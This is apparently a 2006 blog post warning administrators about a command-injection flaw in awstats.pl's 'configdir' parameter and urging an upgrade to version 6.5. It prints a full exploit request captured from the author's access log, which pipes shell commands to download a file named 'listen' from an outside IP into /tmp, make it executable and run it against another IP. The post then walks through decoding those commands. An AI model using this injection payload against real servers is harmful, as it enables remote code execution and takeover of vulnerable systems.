Tuesday, February 07, 2006

Known awstats (awstats.pl) Vulnerability Logs - Update

The last 2 weeks my httpd/apache access_log has been showered with GET requests, trying to exploit a know vulnerability in awstats 6.3 and prior. This has been resolved in version 6.5 of awstats, so upgrade.

Awstats is a great log tool that generates advanced graphical statistics from your server logs. I have used it on many of my sites to generate graphical statistics. http://awstats.sourceforge.net/

However a vulnerability has been identified in awstats (< 6.3), it could be exploited by attackers to execute arbitrary code and compromise a vulnerable system. The problem results from an input validation error in the "awstats.pl" file when handling the "configdir" parameter, which can be exploited by attackers to execute arbitrary command using "|" characters.)

So if you run use awstats on your webserver and find these kind of logs in your access_log you
should take action and consider your machine as compromised. Upgrade to awstats version 6.5 immediately or asap. Version 6.5 is available for download.
http://awstats.sourceforge.net/#DOWNLOAD

Typical Exploit Attempt For Awstats.pl
GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bw
get%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2f
listen%20216%2e102%2e212%2e115;echo%20YYY;
echo| HTTP/1.1\n
Request Method: GET
Request URI: /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3b
wget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2f
listen%20216%2e102%2e212%2e115;echo%20YYY;
echo|


Explanation: If you are familiar with Unix/Linux you should be able to strip out the commands that this string contains. First out after the GET request is the path to awstats awstats.pl (cgi script, written in perl) Awstats.pl can be used from the command line too.

So after awstats.pl?configdir=|echo;, you should see the %20YYY;cd <- (cd = change directory in Unix) to /tmp. Then wget (utility for non-interactive download of files from
the Web. It supports HTTP, HTTPS, and FTP protocols, as well as
retrieval through HTTP proxies.) wget (ip address)/listen, then change mode command chmod.
chmod listen (file) (listen file = netcat?) I will have to find out and get back on that one.
So check for an update in this posting if you are interested.


Technorati Tags:
, , , , , , , , , , , ,

No comments: